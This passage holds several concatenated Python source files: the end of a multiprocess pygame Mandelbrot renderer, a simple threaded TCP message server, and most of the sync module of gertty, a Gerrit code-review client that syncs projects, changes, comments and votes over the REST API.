# gets the current time to be used for the calculation of the time to compute the Mandelbrot set
time_Start = time.perf_counter()
# Defines the sections of the graph for each computer core to render
# This allows for simultaneous multiprocessing of the data (can reduce the time to update by 60% or more)
sectorMap = [
[[0,int(window_Width/4)],[int(window_Width/4),int(window_Width/2)],[int(window_Width/2),int((window_Width/4)*3)],[int((window_Width/4)*3),window_Width]],
[[0,int(window_Height/4)],[int(window_Height/4),int(window_Height/2)],[int(window_Height/2),int((window_Height/4)*3)],[int((window_Height/4)*3),window_Height]]
]
core_Processes = []
# appends each process to the array to allow for dynamic assignment and operations
for y in range(4):
for x in range(4):
core_Processes.append(Process(target=calculateSector, args=(pixel_Array,sectorMap,x,y,)))
# Starts each of the processes
for process in core_Processes:
process.start()
# Waits for each of the processes to complete
for process in core_Processes:
process.join()
# renders the final array to the screen surface
pixel_Array.make_surface()
# Shows Axis and labels if configured
if (show_Axis == True):
del pixel_Array
font = pygame.font.SysFont('./FiraSans-Regular.ttf', 30)
# adds the axis labels
imag_Label = font.render('Imag', True, (255, 255, 255))
real_Label = font.render('Real', True, (255, 255, 255))
# Adds point labels to the axis
center_Label = font.render('('+str(0+x_Offset)+','+str(0+y_Offset)+')', True, (255, 255, 255))
yPos_Label = font.render('('+str(0+x_Offset)+','+str(-(((0 - (window_Height/2))/window_Height) * 3 / zoom + y_Offset))+')', True, (255, 255, 255))
xNeg_Label = font.render('('+str((((0 - (window_Width/2))/window_Width) * 3 / zoom + x_Offset))+','+str(0+y_Offset)+')', True, (255, 255, 255))
zoom_Label = font.render('Zoom '+str(zoom)+'x', True, (255, 255, 255))
# Renders the text onto the screen
screen.blit(imag_Label,(int(window_Width/2) + 5,5))
screen.blit(real_Label,(window_Width - 50,int(window_Width/2) - 25))
screen.blit(zoom_Label,(5,5))
screen.blit(center_Label,(int(window_Width/2) + 5,int(window_Width/2) + 5))
screen.blit(yPos_Label,(int(window_Width/2) - 90,5))
screen.blit(xNeg_Label,(0,int(window_Width/2) + 5))
# prints to the console the time taken to compute
print("Computational Time: %5.1f secs" % (time.perf_counter() - time_Start))
def __init__():
global window_Width, window_Height, precision, zoom, x_Offset, y_Offset, show_Axis
window_Width = 1000
window_Height = 1000
precision = 10000
zoom = 10
x_Offset = -0.5
y_Offset = 0
show_Axis = True
completed_Config = False
# asks the user if they want to use a custom configuration for the render
while completed_Config == False:
default_Mode = input("Use default config options (y/n): ")
if (default_Mode.lower() == "y" or default_Mode.lower() == "yes"):
completed_Config = True
elif (default_Mode.lower() == "n" or default_Mode.lower() == "no"):
completed_Config = True
else:
print("Value was invalid please try again")
# Manual Configuration Options
if (default_Mode.lower() == "n" or default_Mode.lower() == "no"):
completed_Config = False
while completed_Config == False:
try:
precision = int(input("Enter Precision: "))
completed_Config = True
except:
print("Value was invalid please try again")
completed_Config = False
while completed_Config == False:
try:
zoom = float(input("Enter Zoom level (Must be > 0): "))
if zoom <= 0: raise ValueError("zoom must be greater than zero")
completed_Config = True
except:
print("Value was invalid please try again")
completed_Config = False
while completed_Config == False:
try:
x_Offset = float(input("Enter x_Offset: "))
completed_Config = True
except:
print("Value was invalid please try again")
completed_Config = False
while completed_Config == False:
try:
y_Offset = float(input("Enter y_Offset: "))
completed_Config = True
except:
print("Value was invalid please try again")
completed_Config = False
while completed_Config == False:
input_Value = input("Show Axis? (true,false): ")
if (input_Value.lower() == "t" or input_Value.lower() == "true"):
show_Axis = True
completed_Config = True
elif (input_Value.lower() == "f" or input_Value.lower() == "false"):
show_Axis = False
completed_Config = True
else:
print("Value was invalid please try again")
def __main__():
global screen
screen = pygame.display.set_mode((window_Width,window_Height))
screen.fill((46, 48, 58))
# Sets the application window title
pygame.display.set_caption("Mitchell Wills 2020 | Mandelbrot Set")
render_MandelbrotSet()
while True:
# Keeps application running until the user closes it
events = pygame.event.get()
refresh_Rate.tick(24)
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
__init__()
__main__()
|
server.py
|
import socket
import threading
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.send("Msg received".encode(FORMAT))
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
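# A minimal client sketch for this framing (illustrative only, not part of
# the original file; it reuses the HEADER/FORMAT/ADDR constants defined
# above). The hypothetical send() helper pads the payload length to HEADER
# bytes before sending the payload, which is exactly what handle_client()
# reads on the other end.
#
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect(ADDR)
#   def send(msg):
#       message = msg.encode(FORMAT)
#       send_length = str(len(message)).encode(FORMAT)
#       send_length += b' ' * (HEADER - len(send_length))
#       client.send(send_length)
#       client.send(message)
#   send("Hello world!")
#   send(DISCONNECT_MESSAGE)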
|
sync.py
|
# Copyright 2014 OpenStack Foundation
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import errno
import logging
import math
import os
import re
import threading
import json
import time
import datetime
import warnings
import dateutil.parser
try:
import ordereddict
except ImportError:
pass
import requests
import requests.utils
import six
from six.moves import queue
from six.moves.urllib import parse as urlparse
import gertty.version
from gertty import gitrepo
from gertty.auth import FormAuth
HIGH_PRIORITY=0
NORMAL_PRIORITY=1
LOW_PRIORITY=2
TIMEOUT=30
CLOSED_STATUSES = ['MERGED', 'ABANDONED']
class OfflineError(Exception):
pass
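# A simple priority queue: one FIFO deque per priority level, guarded by a
# single condition variable. get() scans the deques in priority order and
# blocks until an item is available; items are tracked in `incomplete` until
# complete() is called, so qsize() also reflects in-flight work.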
class MultiQueue(object):
def __init__(self, priorities):
try:
self.queues = collections.OrderedDict()
except AttributeError:
self.queues = ordereddict.OrderedDict()
for key in priorities:
self.queues[key] = collections.deque()
self.condition = threading.Condition()
self.incomplete = []
def qsize(self):
count = 0
self.condition.acquire()
try:
for queue in self.queues.values():
count += len(queue)
return count + len(self.incomplete)
finally:
self.condition.release()
def put(self, item, priority):
added = False
self.condition.acquire()
try:
if item not in self.queues[priority]:
self.queues[priority].append(item)
added = True
self.condition.notify()
finally:
self.condition.release()
return added
def get(self):
self.condition.acquire()
try:
while True:
for queue in self.queues.values():
try:
ret = queue.popleft()
self.incomplete.append(ret)
return ret
except IndexError:
pass
self.condition.wait()
finally:
self.condition.release()
def find(self, klass, priority):
results = []
self.condition.acquire()
try:
for item in self.queues[priority]:
if isinstance(item, klass):
results.append(item)
finally:
self.condition.release()
return results
def complete(self, item):
self.condition.acquire()
try:
if item in self.incomplete:
self.incomplete.remove(item)
finally:
self.condition.release()
class UpdateEvent(object):
def updateRelatedChanges(self, session, change):
related_change_keys = set()
related_change_keys.add(change.key)
for revision in change.revisions:
parent = session.getRevisionByCommit(revision.parent)
if parent:
related_change_keys.add(parent.change.key)
for child in session.getRevisionsByParent(revision.commit):
related_change_keys.add(child.change.key)
self.related_change_keys = related_change_keys
class ProjectAddedEvent(UpdateEvent):
def __repr__(self):
return '<ProjectAddedEvent project_key:%s>' % (
self.project_key,)
def __init__(self, project):
self.project_key = project.key
class ChangeAddedEvent(UpdateEvent):
def __repr__(self):
return '<ChangeAddedEvent project_key:%s change_key:%s>' % (
self.project_key, self.change_key)
def __init__(self, change):
self.project_key = change.project.key
self.change_key = change.key
self.related_change_keys = set()
self.review_flag_changed = True
self.status_changed = True
self.held_changed = False
class ChangeUpdatedEvent(UpdateEvent):
def __repr__(self):
return '<ChangeUpdatedEvent project_key:%s change_key:%s review_flag_changed:%s status_changed:%s>' % (
self.project_key, self.change_key, self.review_flag_changed, self.status_changed)
def __init__(self, change):
self.project_key = change.project.key
self.change_key = change.key
self.related_change_keys = set()
self.review_flag_changed = False
self.status_changed = False
self.held_changed = False
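# Base class for all sync work items: each task carries a priority, a
# threading.Event used to signal completion to wait() callers, an optional
# list of subtasks, and a list of result events handed back to the UI.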
class Task(object):
def __init__(self, priority=NORMAL_PRIORITY):
self.log = logging.getLogger('gertty.sync')
self.priority = priority
self.succeeded = None
self.event = threading.Event()
self.tasks = []
self.results = []
def complete(self, success):
self.succeeded = success
self.event.set()
def wait(self, timeout=None):
self.event.wait(timeout)
return self.succeeded
def __eq__(self, other):
raise NotImplementedError()
class SyncOwnAccountTask(Task):
def __repr__(self):
return '<SyncOwnAccountTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('accounts/self')
sync.account_id = remote['_account_id']
with app.db.getSession() as session:
session.getAccountByID(remote['_account_id'],
remote.get('name'),
remote.get('username'),
remote.get('email'))
class GetVersionTask(Task):
def __repr__(self):
return '<GetVersionTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
version = sync.get('config/server/version')
sync.setRemoteVersion(version)
class SyncProjectListTask(Task):
def __repr__(self):
return '<SyncProjectListTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('projects/?d')
remote_keys = set(remote.keys())
with app.db.getSession() as session:
local = {}
for p in session.getProjects():
local[p.name] = p
local_keys = set(local.keys())
for name in local_keys-remote_keys:
self.log.info("Deleted project %s", name)
local[name].delete()
for name in remote_keys-local_keys:
p = remote[name]
project = session.createProject(name,
description=p.get('description', ''))
self.log.info("Created project %s", project.name)
self.results.append(ProjectAddedEvent(project))
class SyncSubscribedProjectBranchesTask(Task):
def __repr__(self):
return '<SyncSubscribedProjectBranchesTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
projects = session.getProjects(subscribed=True)
for p in projects:
sync.submitTask(SyncProjectBranchesTask(p.name, self.priority))
class SyncProjectBranchesTask(Task):
branch_re = re.compile(r'refs/heads/(.*)')
def __init__(self, project_name, priority=NORMAL_PRIORITY):
super(SyncProjectBranchesTask, self).__init__(priority)
self.project_name = project_name
def __repr__(self):
return '<SyncProjectBranchesTask %s>' % (self.project_name,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_name == self.project_name):
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('projects/%s/branches/' % urlparse.quote_plus(self.project_name))
remote_branches = set()
for x in remote:
m = self.branch_re.match(x['ref'])
if m:
remote_branches.add(m.group(1))
with app.db.getSession() as session:
local = {}
project = session.getProjectByName(self.project_name)
for branch in project.branches:
local[branch.name] = branch
local_branches = set(local.keys())
for name in local_branches-remote_branches:
session.delete(local[name])
self.log.info("Deleted branch %s from project %s in local DB.", name, project.name)
for name in remote_branches-local_branches:
project.createBranch(name)
self.log.info("Added branch %s to project %s in local DB.", name, project.name)
class SyncSubscribedProjectsTask(Task):
def __repr__(self):
return '<SyncSubscribedProjectsTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
keys = [p.key for p in session.getProjects(subscribed=True)]
for i in range(0, len(keys), 10):
t = SyncProjectTask(keys[i:i+10], self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = SyncQueriedChangesTask('owner', 'is:owner', self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = SyncQueriedChangesTask('starred', 'is:starred', self.priority)
self.tasks.append(t)
sync.submitTask(t)
class SyncProjectTask(Task):
def __init__(self, project_keys, priority=NORMAL_PRIORITY):
super(SyncProjectTask, self).__init__(priority)
if type(project_keys) == int:
project_keys = [project_keys]
self.project_keys = project_keys
def __repr__(self):
return '<SyncProjectTask %s>' % (self.project_keys,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_keys == self.project_keys):
return True
return False
def run(self, sync):
app = sync.app
now = datetime.datetime.utcnow()
queries = []
with app.db.getSession() as session:
for project_key in self.project_keys:
project = session.getProject(project_key)
query = 'q=project:%s' % project.name
if project.updated:
# Allow 4 seconds for request time, etc.
query += ' -age:%ss' % (int(math.ceil((now-project.updated).total_seconds())) + 4,)
else:
query += ' status:open'
queries.append(query)
changes = sync.query(queries)
change_ids = [c['id'] for c in changes]
with app.db.getSession() as session:
# Winnow the list of IDs to only the ones in the local DB.
change_ids = session.getChangeIDs(change_ids)
for c in changes:
# For now, just sync open changes or changes already
# in the db; optionally we could sync all changes ever
if c['id'] in change_ids or (c['status'] not in CLOSED_STATUSES):
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
for key in self.project_keys:
sync.submitTask(SetProjectUpdatedTask(key, now, priority=self.priority))
class SetProjectUpdatedTask(Task):
def __init__(self, project_key, updated, priority=NORMAL_PRIORITY):
super(SetProjectUpdatedTask, self).__init__(priority)
self.project_key = project_key
self.updated = updated
def __repr__(self):
return '<SetProjectUpdatedTask %s %s>' % (self.project_key, self.updated)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_key == self.project_key and
other.updated == self.updated):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
project = session.getProject(self.project_key)
project.updated = self.updated
class SyncQueriedChangesTask(Task):
def __init__(self, query_name, query, priority=NORMAL_PRIORITY):
super(SyncQueriedChangesTask, self).__init__(priority)
self.query_name = query_name
self.query = query
def __repr__(self):
return '<SyncQueriedChangesTask %s>' % self.query_name
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.query_name == self.query_name and
other.query == self.query):
return True
return False
def run(self, sync):
app = sync.app
now = datetime.datetime.utcnow()
with app.db.getSession() as session:
sync_query = session.getSyncQueryByName(self.query_name)
query = 'q=%s' % self.query
if sync_query.updated:
# Allow 4 seconds for request time, etc.
query += ' -age:%ss' % (int(math.ceil((now-sync_query.updated).total_seconds())) + 4,)
else:
query += ' status:open'
for project in session.getProjects(subscribed=True):
query += ' -project:%s' % project.name
changes = []
sortkey = ''
done = False
offset = 0
while not done:
# We don't actually want to limit to 500, but that's the server-side default, and
# if we don't specify this, we won't get a _more_changes flag.
q = 'changes/?n=500%s&%s' % (sortkey, query)
self.log.debug('Query: %s ' % (q,))
batch = sync.get(q)
done = True
if batch:
changes += batch
if '_more_changes' in batch[-1]:
done = False
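# Older Gerrit servers resume paging with a _sortkey token; newer ones
# use a numeric start offset instead.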
if '_sortkey' in batch[-1]:
sortkey = '&N=%s' % (batch[-1]['_sortkey'],)
else:
offset += len(batch)
sortkey = '&start=%s' % (offset,)
change_ids = [c['id'] for c in changes]
with app.db.getSession() as session:
# Winnow the list of IDs to only the ones in the local DB.
change_ids = session.getChangeIDs(change_ids)
for c in changes:
# For now, just sync open changes or changes already
# in the db; optionally we could sync all changes ever
if c['id'] in change_ids or (c['status'] not in CLOSED_STATUSES):
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
sync.submitTask(SetSyncQueryUpdatedTask(self.query_name, now, priority=self.priority))
class SetSyncQueryUpdatedTask(Task):
def __init__(self, query_name, updated, priority=NORMAL_PRIORITY):
super(SetSyncQueryUpdatedTask, self).__init__(priority)
self.query_name = query_name
self.updated = updated
def __repr__(self):
return '<SetSyncQueryUpdatedTask %s %s>' % (self.query_name, self.updated)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.query_name == self.query_name and
other.updated == self.updated):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
sync_query = session.getSyncQueryByName(self.query_name)
sync_query.updated = self.updated
class SyncChangesByCommitsTask(Task):
def __init__(self, commits, priority=NORMAL_PRIORITY):
super(SyncChangesByCommitsTask, self).__init__(priority)
self.commits = commits
def __repr__(self):
return '<SyncChangesByCommitsTask %s>' % (self.commits,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.commits == self.commits):
return True
return False
def run(self, sync):
query = ' OR '.join(['commit:%s' % x for x in self.commits])
changes = sync.get('changes/?q=%s' % query)
self.log.debug('Query: %s ' % (query,))
for c in changes:
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
self.log.debug("Sync change %s for its commit" % (c['id'],))
def addCommit(self, commit):
if commit in self.commits:
return True
# 100 should be under the URL length limit
if len(self.commits) >= 100:
return False
self.commits.append(commit)
return True
class SyncChangeByNumberTask(Task):
def __init__(self, number, priority=NORMAL_PRIORITY):
super(SyncChangeByNumberTask, self).__init__(priority)
self.number = number
def __repr__(self):
return '<SyncChangeByNumberTask %s>' % (self.number,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.number == self.number):
return True
return False
def run(self, sync):
query = '%s' % self.number
changes = sync.get('changes/?q=%s' % query)
self.log.debug('Query: %s ' % (query,))
for c in changes:
task = SyncChangeTask(c['id'], priority=self.priority)
self.tasks.append(task)
sync.submitTask(task)
self.log.debug("Sync change %s because it is number %s" % (c['id'], self.number))
class SyncOutdatedChangesTask(Task):
def __init__(self, priority=NORMAL_PRIORITY):
super(SyncOutdatedChangesTask, self).__init__(priority)
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def __repr__(self):
return '<SyncOutdatedChangesTask>'
def run(self, sync):
with sync.app.db.getSession() as session:
for change in session.getOutdated():
self.log.debug("Sync outdated change %s" % (change.id,))
sync.submitTask(SyncChangeTask(change.id, priority=self.priority))
class SyncChangeTask(Task):
def __init__(self, change_id, force_fetch=False, priority=NORMAL_PRIORITY):
super(SyncChangeTask, self).__init__(priority)
self.change_id = change_id
self.force_fetch = force_fetch
def __repr__(self):
return '<SyncChangeTask %s>' % (self.change_id,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.change_id == self.change_id and
other.force_fetch == self.force_fetch):
return True
return False
def run(self, sync):
start_time = time.time()
try:
self._syncChange(sync)
end_time = time.time()
total_time = end_time - start_time
self.log.info("Synced change %s in %0.5f seconds.", self.change_id, total_time)
except Exception:
try:
self.log.error("Marking change %s outdated" % (self.change_id,))
with sync.app.db.getSession() as session:
change = session.getChangeByID(self.change_id)
if change:
change.outdated = True
except Exception:
self.log.exception("Error while marking change %s as outdated" % (self.change_id,))
raise
def _syncChange(self, sync):
app = sync.app
remote_change = sync.get('changes/%s?o=DETAILED_LABELS&o=ALL_REVISIONS&o=ALL_COMMITS&o=MESSAGES&o=DETAILED_ACCOUNTS&o=CURRENT_ACTIONS&o=ALL_FILES' % self.change_id)
# Perform subqueries this task will need outside of the db session
for remote_commit, remote_revision in remote_change.get('revisions', {}).items():
remote_comments_data = sync.get('changes/%s/revisions/%s/comments' % (self.change_id, remote_commit))
remote_revision['_gertty_remote_comments_data'] = remote_comments_data
try:
remote_conflicts = sync.query(['q=status:open+is:mergeable+conflicts:%s' %
remote_change['_number']])
except Exception:
self.log.exception("Unable to sync conflicts for change %s" % self.change_id)
warnings.warn("Unable to sync conflicts for change %s" % self.change_id)
remote_conflicts = []
fetches = collections.defaultdict(list)
parent_commits = set()
with app.db.getSession() as session:
change = session.getChangeByID(self.change_id)
account = session.getAccountByID(remote_change['owner']['_account_id'],
name=remote_change['owner'].get('name'),
username=remote_change['owner'].get('username'),
email=remote_change['owner'].get('email'))
if not change:
project = session.getProjectByName(remote_change['project'])
if not project:
self.log.debug("Project %s unknown while syncing change" % (
remote_change['project'],))
remote_project = sync.get('projects/%s' %
(urlparse.quote_plus(remote_change['project']),))
if remote_project:
project = session.createProject(
remote_project['name'],
description=remote_project.get('description', ''))
self.log.info("Created project %s", project.name)
self.results.append(ProjectAddedEvent(project))
sync.submitTask(SyncProjectBranchesTask(project.name, self.priority))
created = dateutil.parser.parse(remote_change['created'])
updated = dateutil.parser.parse(remote_change['updated'])
change = project.createChange(remote_change['id'], account, remote_change['_number'],
remote_change['branch'], remote_change['change_id'],
remote_change['subject'], created,
updated, remote_change['status'],
topic=remote_change.get('topic'))
self.log.info("Created new change %s in local DB.", change.id)
result = ChangeAddedEvent(change)
else:
result = ChangeUpdatedEvent(change)
app.project_cache.clear(change.project)
self.results.append(result)
change.owner = account
if change.status != remote_change['status']:
change.status = remote_change['status']
result.status_changed = True
if remote_change.get('starred'):
change.starred = True
else:
change.starred = False
change.subject = remote_change['subject']
change.updated = dateutil.parser.parse(remote_change['updated'])
change.topic = remote_change.get('topic')
unseen_conflicts = [x.id for x in change.conflicts]
for remote_conflict in remote_conflicts:
conflict_id = remote_conflict['id']
conflict = session.getChangeByID(conflict_id)
if not conflict:
self.log.info("Need to sync conflicting change %s for change %s.",
conflict_id, change.number)
sync.submitTask(SyncChangeTask(conflict_id, priority=self.priority))
else:
if conflict not in change.conflicts:
self.log.info("Added conflict %s for change %s in local DB.",
conflict.number, change.number)
change.addConflict(conflict)
self.results.append(ChangeUpdatedEvent(conflict))
if conflict_id in unseen_conflicts:
unseen_conflicts.remove(conflict_id)
for conflict_id in unseen_conflicts:
conflict = session.getChangeByID(conflict_id)
self.log.info("Deleted conflict %s for change %s in local DB.",
conflict.number, change.number)
change.delConflict(conflict)
self.results.append(ChangeUpdatedEvent(conflict))
repo = gitrepo.get_repo(change.project.name, app.config)
new_revision = False
for remote_commit, remote_revision in remote_change.get('revisions', {}).items():
revision = session.getRevisionByCommit(remote_commit)
# TODO: handle multiple parents
url = sync.app.config.git_url + change.project.name
if 'anonymous http' in remote_revision['fetch']:
ref = remote_revision['fetch']['anonymous http']['ref']
url = remote_revision['fetch']['anonymous http']['url']
auth = False
elif 'http' in remote_revision['fetch']:
auth = True
ref = remote_revision['fetch']['http']['ref']
url = list(urlparse.urlsplit(sync.app.config.url + change.project.name))
url[1] = '%s:%s@%s' % (
urlparse.quote_plus(sync.app.config.username),
urlparse.quote_plus(sync.app.config.password), url[1])
url = urlparse.urlunsplit(url)
elif 'ssh' in remote_revision['fetch']:
ref = remote_revision['fetch']['ssh']['ref']
url = remote_revision['fetch']['ssh']['url']
auth = False
elif 'git' in remote_revision['fetch']:
ref = remote_revision['fetch']['git']['ref']
url = remote_revision['fetch']['git']['url']
auth = False
else:
if len(remote_revision['fetch']):
errMessage = "No supported fetch method found. Server offers: %s" % (
', '.join(remote_revision['fetch'].keys()))
else:
errMessage = "The server is missing the download-commands plugin."
raise Exception(errMessage)
if (not revision) or self.force_fetch:
fetches[url].append('+%(ref)s:%(ref)s' % dict(ref=ref))
if not revision:
revision = change.createRevision(remote_revision['_number'],
remote_revision['commit']['message'], remote_commit,
remote_revision['commit']['parents'][0]['commit'],
auth, ref)
self.log.info("Created new revision %s for change %s revision %s in local DB.",
revision.key, self.change_id, remote_revision['_number'])
new_revision = True
revision.message = remote_revision['commit']['message']
actions = remote_revision.get('actions', {})
revision.can_submit = 'submit' in actions
# TODO: handle multiple parents
if revision.parent not in parent_commits:
parent_revision = session.getRevisionByCommit(revision.parent)
if not parent_revision and change.status not in CLOSED_STATUSES:
sync._syncChangeByCommit(revision.parent, self.priority)
self.log.debug("Change %s revision %s needs parent commit %s synced" %
(change.id, remote_revision['_number'], revision.parent))
parent_commits.add(revision.parent)
result.updateRelatedChanges(session, change)
f = revision.getFile('/COMMIT_MSG')
if f is None:
f = revision.createFile('/COMMIT_MSG', None,
None, None, None)
for remote_path, remote_file in remote_revision['files'].items():
f = revision.getFile(remote_path)
if f is None:
if remote_file.get('binary'):
inserted = deleted = None
else:
inserted = remote_file.get('lines_inserted', 0)
deleted = remote_file.get('lines_deleted', 0)
f = revision.createFile(remote_path, remote_file.get('status', 'M'),
remote_file.get('old_path'),
inserted, deleted)
remote_comments_data = remote_revision['_gertty_remote_comments_data']
for remote_file, remote_comments in remote_comments_data.items():
for remote_comment in remote_comments:
account = session.getAccountByID(remote_comment['author']['_account_id'],
name=remote_comment['author'].get('name'),
username=remote_comment['author'].get('username'),
email=remote_comment['author'].get('email'))
comment = session.getCommentByID(remote_comment['id'])
if not comment:
# Normalize updated -> created
created = dateutil.parser.parse(remote_comment['updated'])
parent = False
if remote_comment.get('side', '') == 'PARENT':
parent = True
fileobj = revision.getFile(remote_file)
if fileobj is None:
fileobj = revision.createFile(remote_file, 'M')
comment = fileobj.createComment(remote_comment['id'], account,
remote_comment.get('in_reply_to'),
created,
parent, remote_comment.get('line'),
remote_comment['message'])
self.log.info("Created new comment %s for revision %s in local DB.",
comment.key, revision.key)
else:
if comment.author != account:
comment.author = account
new_message = False
for remote_message in remote_change.get('messages', []):
if 'author' in remote_message:
account = session.getAccountByID(remote_message['author']['_account_id'],
name=remote_message['author'].get('name'),
username=remote_message['author'].get('username'),
email=remote_message['author'].get('email'))
if account.username != app.config.username:
new_message = True
else:
account = session.getSystemAccount()
message = session.getMessageByID(remote_message['id'])
if not message:
revision = session.getRevisionByNumber(change, remote_message.get('_revision_number', 1))
if revision:
# Normalize date -> created
created = dateutil.parser.parse(remote_message['date'])
message = revision.createMessage(remote_message['id'], account, created,
remote_message['message'])
self.log.info("Created new review message %s for revision %s in local DB.", message.key, revision.key)
else:
self.log.info("Unable to create new review message for revision %s because it is not in local DB (draft?).", remote_message.get('_revision_number'))
else:
if message.author != account:
message.author = account
remote_approval_entries = {}
remote_label_entries = {}
user_voted = False
for remote_label_name, remote_label_dict in remote_change.get('labels', {}).items():
for remote_approval in remote_label_dict.get('all', []):
if remote_approval.get('value') is None:
continue
remote_approval['category'] = remote_label_name
key = '%s~%s' % (remote_approval['category'], remote_approval['_account_id'])
remote_approval_entries[key] = remote_approval
if remote_approval['_account_id'] == sync.account_id and int(remote_approval['value']) != 0:
user_voted = True
for key, value in remote_label_dict.get('values', {}).items():
# Each entry maps a label value to its description, e.g. +1: "LGTM"
label = dict(value=key,
description=value,
category=remote_label_name)
key = '%s~%s~%s' % (label['category'], label['value'], label['description'])
remote_label_entries[key] = label
remote_approval_keys = set(remote_approval_entries.keys())
remote_label_keys = set(remote_label_entries.keys())
local_approvals = {}
local_labels = {}
user_votes = {}
for approval in change.approvals:
if approval.draft and not new_revision:
# If we have a new revision, we need to delete
# draft local approvals because they can no longer
# be uploaded. Otherwise, keep them because we
# may be about to upload a review. Ignoring an
# approval here means it will not be deleted.
# Also keep track of these approvals so we can
# determine whether we should hold the change
# later.
user_votes[approval.category] = approval.value
# Count draft votes as having voted for the
# purposes of deciding whether to clear the
# reviewed flag later.
user_voted = True
continue
key = '%s~%s' % (approval.category, approval.reviewer.id)
if key in local_approvals:
# Delete duplicate approvals.
session.delete(approval)
else:
local_approvals[key] = approval
local_approval_keys = set(local_approvals.keys())
for label in change.labels:
key = '%s~%s~%s' % (label.category, label.value, label.description)
local_labels[key] = label
local_label_keys = set(local_labels.keys())
for key in local_approval_keys-remote_approval_keys:
session.delete(local_approvals[key])
for key in local_label_keys-remote_label_keys:
session.delete(local_labels[key])
for key in remote_approval_keys-local_approval_keys:
remote_approval = remote_approval_entries[key]
account = session.getAccountByID(remote_approval['_account_id'],
name=remote_approval.get('name'),
username=remote_approval.get('username'),
email=remote_approval.get('email'))
change.createApproval(account,
remote_approval['category'],
remote_approval['value'])
self.log.info("Created approval for change %s in local DB.", change.id)
user_value = user_votes.get(remote_approval['category'], 0)
if user_value > 0 and remote_approval['value'] < 0:
# Someone left a negative vote after the local
# user created a draft positive vote. Hold the
# change so that it doesn't look like the local
# user is ignoring negative feedback.
if not change.held:
change.held = True
result.held_changed = True
self.log.info("Setting change %s to held due to negative review after positive", change.id)
for key in remote_label_keys-local_label_keys:
remote_label = remote_label_entries[key]
change.createLabel(remote_label['category'],
remote_label['value'],
remote_label['description'])
for key in remote_approval_keys.intersection(local_approval_keys):
local_approval = local_approvals[key]
remote_approval = remote_approval_entries[key]
local_approval.value = remote_approval['value']
# For the side effect of updating account info:
account = session.getAccountByID(remote_approval['_account_id'],
name=remote_approval.get('name'),
username=remote_approval.get('username'),
email=remote_approval.get('email'))
remote_permitted_entries = {}
for remote_label_name, remote_label_values in remote_change.get('permitted_labels', {}).items():
for remote_label_value in remote_label_values:
remote_label = dict(category=remote_label_name,
value=remote_label_value)
key = '%s~%s' % (remote_label['category'], remote_label['value'])
remote_permitted_entries[key] = remote_label
remote_permitted_keys = set(remote_permitted_entries.keys())
local_permitted = {}
for permitted in change.permitted_labels:
key = '%s~%s' % (permitted.category, permitted.value)
local_permitted[key] = permitted
local_permitted_keys = set(local_permitted.keys())
for key in local_permitted_keys-remote_permitted_keys:
session.delete(local_permitted[key])
for key in remote_permitted_keys-local_permitted_keys:
remote_permitted = remote_permitted_entries[key]
change.createPermittedLabel(remote_permitted['category'],
remote_permitted['value'])
if not user_voted:
# Only consider changing the reviewed state if we don't have a vote
if new_revision or new_message:
if change.reviewed:
change.reviewed = False
result.review_flag_changed = True
app.project_cache.clear(change.project)
change.outdated = False
for url, refs in fetches.items():
self.log.debug("Fetching from %s with refs %s", url, refs)
try:
repo.fetch(url, refs)
except Exception:
# Backwards compat with GitPython before the multi-ref fetch
# patch.
# (https://github.com/gitpython-developers/GitPython/pull/170)
for ref in refs:
self.log.debug("git fetch %s %s" % (url, ref))
repo.fetch(url, ref)
class CheckReposTask(Task):
# On startup, check all subscribed projects: for any project without a
# local repo (or for every project, if --fetch-missing-refs is supplied),
